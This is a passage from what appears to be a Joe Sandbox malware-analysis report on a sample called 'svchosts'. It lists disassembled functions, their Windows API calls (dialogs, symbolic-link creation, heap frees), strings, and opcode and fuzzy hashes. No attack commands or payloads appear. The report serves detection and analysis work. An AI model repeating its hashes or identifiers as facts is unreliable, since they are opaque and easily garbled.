Function 002ADC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 47e03629701862062c987b0d59a7977401c7e431fc761778b22d4573d1c65172
Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
Opcode Fuzzy Hash: 47e03629701862062c987b0d59a7977401c7e431fc761778b22d4573d1c65172
Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830

Function 002ADC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c56a65d9a1e072196602ad7011cdfe19a06c758802b2113864e4ae301da22853
Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
Opcode Fuzzy Hash: c56a65d9a1e072196602ad7011cdfe19a06c758802b2113864e4ae301da22853
Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830

Function 002ADC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42c24a0497664c04da88f7601574bad9002824c7a856f50f86de3839d36f4d36
Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
Opcode Fuzzy Hash: 42c24a0497664c04da88f7601574bad9002824c7a856f50f86de3839d36f4d36
Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830

Function 002ADC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADC36

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc28fabe29f999f2e2f7cc2f72a086048791ab4ceb52a3fe846861e9e3624d08
Instruction ID: aeb3fdfd6ac10d2fbe9a7a36cac468d8a0d2355b96927af17a09911bc7595d86
Opcode Fuzzy Hash: cc28fabe29f999f2e2f7cc2f72a086048791ab4ceb52a3fe846861e9e3624d08
Instruction Fuzzy Hash: C4A0129917C1027D300C31102C03E37022CC0C2F20370490EF007D08419DC01C244430

Function 002ADC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADC36

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e2596788143ff9c27d2e4996efed90415c3324bce4e56aeec65fb6b6ab95a9f
Instruction ID: aeb3fdfd6ac10d2fbe9a7a36cac468d8a0d2355b96927af17a09911bc7595d86
Opcode Fuzzy Hash: 4e2596788143ff9c27d2e4996efed90415c3324bce4e56aeec65fb6b6ab95a9f
Instruction Fuzzy Hash: C4A0129917C1027D300C31102C03E37022CC0C2F20370490EF007D08419DC01C244430

Function 002AA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,002AA587,C:\Users\user\Desktop,00000000,002D946A,00000006), ref: 002AA326

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 32ea30811227462d4aecab7f95f35f49fdcf853a095f6653b7f50a9faaac8b20
Instruction ID: 2352e63cd67d5e5c1560755f3674b57aa4b2c394b958750cb07fde0dcf7dffe3
Opcode Fuzzy Hash: 32ea30811227462d4aecab7f95f35f49fdcf853a095f6653b7f50a9faaac8b20
Instruction Fuzzy Hash: FAA012301940065A8E004B30DC0DC1576505760702F00CA20700AC00A0CB30C814A500

Non-executed Functions

Function 002AB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002AB971
EndDialog.USER32(?,00000006), ref: 002AB984
GetDlgItem.USER32(?,0000006C), ref: 002AB9A0
SetFocus.USER32(00000000), ref: 002AB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 002AB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002ABA18
FindFirstFileW.KERNEL32(?,?), ref: 002ABA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002ABA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 002ABA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002ABA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002ABA94
_swprintf.LIBCMT ref: 002ABAC4

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 002ABAD7
FindClose.KERNEL32(00000000), ref: 002ABADE
_swprintf.LIBCMT ref: 002ABB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 002ABB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002ABB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002ABB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 002ABB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002ABBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002ABBC9
_swprintf.LIBCMT ref: 002ABBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 002ABC08
_swprintf.LIBCMT ref: 002ABC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 002ABC6F

Part of subcall function 002AA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002AA662
Part of subcall function 002AA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,002CE600,?,?), ref: 002AA6B1

Strings

%s %s, xrefs: 002ABB29, 002ABC4E
REPLACEFILEDLG, xrefs: 002AB907
%s %s %s, xrefs: 002ABAB2, 002ABBE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: fa5f6c4e090099eefd1ba349ae9dda09947d3406983c8cf3ea274bd10f9387db
Instruction ID: a6ee6d7cf28412b584ab721a779c12c38874742031b7f7d5a9a5feded7bff1ad
Opcode Fuzzy Hash: fa5f6c4e090099eefd1ba349ae9dda09947d3406983c8cf3ea274bd10f9387db
Instruction Fuzzy Hash: A791B0B2158349BFD621DBA0DD49FFB77ACEB4B700F044819B749D2092DB71AA14CB62

Function 0029718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00297191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002972F1
CloseHandle.KERNEL32(00000000), ref: 00297301

Part of subcall function 00297BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00297C04
Part of subcall function 00297BF5: GetLastError.KERNEL32 ref: 00297C4A
Part of subcall function 00297BF5: CloseHandle.KERNEL32(?), ref: 00297C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0029730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0029741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00297446
CloseHandle.KERNEL32(?), ref: 00297457
GetLastError.KERNEL32 ref: 00297467
RemoveDirectoryW.KERNEL32(?), ref: 002974B3
DeleteFileW.KERNEL32(?), ref: 002974DB

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 002971BC
SeRestorePrivilege, xrefs: 002971B2
UNC\, xrefs: 0029723C
\??\, xrefs: 00297217

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 0168e38a11f7dc675484cdd9fd42a5cd5a437ae9a10b18b134ba41083c3fb211
Instruction ID: dce8cbc62e6ad6acd05b2d941ddbc6a65a6f5768df8f5ebf0c50428fefdac9e3
Opcode Fuzzy Hash: 0168e38a11f7dc675484cdd9fd42a5cd5a437ae9a10b18b134ba41083c3fb211
Instruction Fuzzy Hash: AEB1C171924215ABDF20DF64DC85FEEB7B8AF04300F0445A9F949E7142DB34AA59CBA1

Function 002AA63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002AA662
GetNumberFormatW.KERNEL32(00000400,00000000,?,002CE600,?,?), ref: 002AA6B1

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: e1156655581cc2455eb500ebc7cf00f805dc2ced34680ae66668fcb8d93fef2c
Instruction ID: 94cc3b3555d7bc207a445f45446f9bbcdd3808328835620f3299d45af6614f1a
Opcode Fuzzy Hash: e1156655581cc2455eb500ebc7cf00f805dc2ced34680ae66668fcb8d93fef2c
Instruction Fuzzy Hash: C5015A36560248BFDF10DFA4EC49FAB77BCEF19710F115822FA0997150D7709A248BA5

Function 0029ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0029AD1A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ab723ed88b08d3fc26ca8c14c571035f74cb05417fe149f751627356192b0e35
Instruction ID: fe6c4173e900a261b517832249547b14a07338e3cdac839115aff8c72edf8c40
Opcode Fuzzy Hash: ab723ed88b08d3fc26ca8c14c571035f74cb05417fe149f751627356192b0e35
Instruction Fuzzy Hash: 94F06DB0D0030C8FCB28CF58FC89AE973B1F749301F200296D918537A4D770AD408EA1

Function 0029DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0029DABE

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

Part of subcall function 002A1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,002D0EE8,00000200,0029D202,00000000,?,00000050,002D0EE8), ref: 002A15B3

_strlen.LIBCMT ref: 0029DADF
SetDlgItemTextW.USER32(?,002CE154,?), ref: 0029DB3F
GetWindowRect.USER32(?,?), ref: 0029DB79
GetClientRect.USER32(?,?), ref: 0029DB85
GetWindowLongW.USER32(?,000000F0), ref: 0029DC25
GetWindowRect.USER32(?,?), ref: 0029DC52
SetWindowTextW.USER32(?,?), ref: 0029DC95
GetSystemMetrics.USER32(00000008), ref: 0029DC9D
GetWindow.USER32(?,00000005), ref: 0029DCA8
GetWindowRect.USER32(00000000,?), ref: 0029DCD5
GetWindow.USER32(00000000,00000002), ref: 0029DD47

Strings

$%s:, xrefs: 0029DAB2
T,, xrefs: 0029DAFA
d, xrefs: 0029DBA5
CAPTION, xrefs: 0029DC77

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$T,$d
API String ID: 2407758923-4153203090
Opcode ID: 542093b41f5c96b49bfa90fcfff5b29005379afe3d69cd6edf9256f24268cd36
Instruction ID: 5c1f0111e3ff91970538b32e304ca48be6dc9c965425ac98fa32436478e19aa8
Opcode Fuzzy Hash: 542093b41f5c96b49bfa90fcfff5b29005379afe3d69cd6edf9256f24268cd36
Instruction Fuzzy Hash: 5981B272118301AFDB10DF68DD89F6BBBE9EB89714F04092DFA8893251D670E819CB52

Function 002BC233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002BC277

Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE2F
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE41
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE53
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE65
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE77
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE89
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE9B
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEAD
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEBF
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBED1
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEE3
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEF5
Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBF07

_free.LIBCMT ref: 002BC26C

Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506

_free.LIBCMT ref: 002BC28E
_free.LIBCMT ref: 002BC2A3
_free.LIBCMT ref: 002BC2AE
_free.LIBCMT ref: 002BC2D0
_free.LIBCMT ref: 002BC2E3
_free.LIBCMT ref: 002BC2F1
_free.LIBCMT ref: 002BC2FC
_free.LIBCMT ref: 002BC334
_free.LIBCMT ref: 002BC33B
_free.LIBCMT ref: 002BC358
_free.LIBCMT ref: 002BC370

Strings

P,, xrefs: 002BC249

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P,
API String ID: 161543041-3718016131
Opcode ID: 6c923b4c9191b1cc5e575d7cdd21ec042145cd1b8979621b746b34ba5aecf718
Instruction ID: b83fd8a96e224365575deb1fe2dc03b3071599e9c5be2750449be8d90cf831cb
Opcode Fuzzy Hash: 6c923b4c9191b1cc5e575d7cdd21ec042145cd1b8979621b746b34ba5aecf718
Instruction Fuzzy Hash: 7E317E316206069FEB20AE78DA45BDA73E9FF00390F64846AF459D7551EF71ACA0CB50

Function 002ACD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 002ACD51
GetClassNameW.USER32(00000000,?,00000800), ref: 002ACD7D

Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 002ACD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002ACDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 002ACDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002ACDED
DeleteObject.GDI32(00000000), ref: 002ACDF4
GetWindow.USER32(00000000,00000002), ref: 002ACDFD

Strings

STATIC, xrefs: 002ACD83

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: abdeb9204efdf1bcd7d147cb7cd39134dc1b8b99625e1b0a13a8f67d32ff3f91
Instruction ID: bb28ae95c84e6db127e94594c61e265d55ae4a864af21a9af547c2bf2c48cdfa
Opcode Fuzzy Hash: abdeb9204efdf1bcd7d147cb7cd39134dc1b8b99625e1b0a13a8f67d32ff3f91
Instruction Fuzzy Hash: 07112733151711BBE6206B20AC0DFAF365CEB677A0F104035FA06A5192CF608D69CAA4

Function 002B8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B8EC5

Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506

_free.LIBCMT ref: 002B8ED1
_free.LIBCMT ref: 002B8EDC
_free.LIBCMT ref: 002B8EE7
_free.LIBCMT ref: 002B8EF2
_free.LIBCMT ref: 002B8EFD
_free.LIBCMT ref: 002B8F08
_free.LIBCMT ref: 002B8F13
_free.LIBCMT ref: 002B8F1E
_free.LIBCMT ref: 002B8F2C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
